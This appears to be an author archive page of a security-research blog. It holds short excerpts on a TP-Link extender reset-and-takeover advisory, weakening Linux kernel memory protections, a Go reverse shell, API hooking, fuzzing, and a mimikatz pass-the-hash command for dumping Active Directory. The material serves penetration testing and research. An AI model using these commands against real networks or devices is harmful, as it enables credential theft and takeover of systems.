Posts By: malwrforensics

Affected Product: TP-Link TL-WA855RE Version: tested on TL-WA855RE(EU)_V5_200415 (possibly earlier versions too) Description: TP-Link TL-WA855RE V5 20200415-rel37464 devices allow an unauthenticated attacker (on the same network) to submit a TDDP_RESET POST request for a factory reset and reboot. The attacker can then obtain full access to the device by setting a new administrative password… Read Article →

If you’re interested in removing some of the memory protections (especially around RWX) in the Linux kernel version 5+, here are some pointers: In the arch folder, edit the Kconfig file, and look for config STRICT_KERNEL_RWX and config STRICT_MODULE_RWX. You can change their default value to the values below. In the init folder, edit the… Read Article →

If you ever want to disable the WriteProtect (WP) bit, you’ll need read/write access to the CR0 register. The problem is that the write_cr0 function provided by the Linux kernel has been tweaked to prevent this exact thing. Here are the steps you need to follow to compile a new kernel and have the… Read Article →

Here is a really small Go reverse shell (30-ish lines of code, including comments). Environment setup: Download/install Go from here. If you use Windows, you may want to download/install the TDM-GCC compiler from here as well. Code: First, we need to define what libraries we need: import "net" import "fmt" import "bufio" import "os/exec"… Read Article →

Below is a basic example on how to use the detours library to hook APIs. #include <stdio.h> #include <windows.h> #include <detours.h> // API that we want to hook DWORD (WINAPI * Real_SleepEx)(DWORD dwMilliseconds, BOOL bAlertable) = SleepEx; // This function will be called *before* the API. // We will modify one of the parameters //… Read Article →

I’ve made some changes to bytefuzz to support files generated by other fuzzers. I’ve used the domato fuzzer to generate 1000 html files and then through bytefuzz, I’ve sent those files to a browser that I use when I do web app security testing. And soon enough, I got some interesting results… 🙂  

Let’s assume you have a program that just crashed and you have a core dump. You can enable core dumps by using the ulimit -c unlimited command. If you want to analyze what happened, here are some steps you can follow: //This will switch the disassembly listing to intel format. (gdb) set disassembly-flavor intel //To… Read Article →

If you want to do web app security testing using either Chrome or Chromium, you may want to disable a few security options so you can actually go through your test cases. You can use the same command line parameters for both of them: /usr/bin/chromium --disable-web-security --disable-xss-auditor --ignore-certificate-errors --user-data-dir=/pentesting/web/temp/data --proxy-server= This works for both Linux… Read Article →

If you have a hash for either a domain admin or a local admin on a domain controller, you can use mimikatz to exfil the entire Active Directory database. From mimikatz, run the following command to spawn a shell as the target user: sekurlsa::pth /user:<username> /domain:<domainname> /ntlm:<hash> /run:cmd.exe Now you have a few options from… Read Article →
